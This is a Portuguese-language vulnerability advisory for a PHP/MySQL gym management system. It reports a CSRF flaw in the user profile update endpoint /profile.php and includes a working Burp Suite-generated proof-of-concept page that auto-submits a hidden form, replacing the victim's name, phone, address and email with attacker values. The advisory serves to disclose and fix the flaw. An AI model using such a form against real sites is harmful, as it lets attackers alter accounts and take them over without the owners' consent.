
Sistema de gestão de academia usando PHP e MYSQL
Um sistema de gerenciamento de academia construído usando PHP e MySQL.
Shoaib Alam - Perfil no LinkedIn
Uma vulnerabilidade de Cross-Site Request Forgery (CSRF) foi identificada no Sistema de Gerenciamento de Academia. Esse problema está presente na funcionalidade de atualização de perfil do Painel do Usuário.
Atualmente, a aplicação não implementa tokens Anti-CSRF, resultando em vulnerabilidade a ataques de Cross-Site Request Forgery (CSRF). Essa fraqueza de segurança afeta especificamente o endpoint /profile.php. Um atacante pode explorar essa falha para realizar modificações não autorizadas em informações sensíveis do usuário, como endereço, nome e número de telefone. Isso pode potencialmente comprometer a integridade das contas de usuário e levar a problemas de segurança adicionais.
Endpoint Vulnerável: /profile.php
Abaixo está uma prova de conceito demonstrando a vulnerabilidade CSRF. Esta PoC foi gerada usando o Burp Suite Professional.
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<form action="http://localhost/gym/profile.php" method="POST">
<input type="hidden" name="fname" value="hacked" />
<input type="hidden" name="lname" value="victim" />
<input type="hidden" name="email" value="attacker@gmail.com" />
<input type="hidden" name="mobile" value="9999999999" />
<input type="hidden" name="state" value="hacked" />
<input type="hidden" name="city" value="hacked" />
<input type="hidden" name="address" value="hacked" />
<input type="hidden" name="submit" value="Update" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>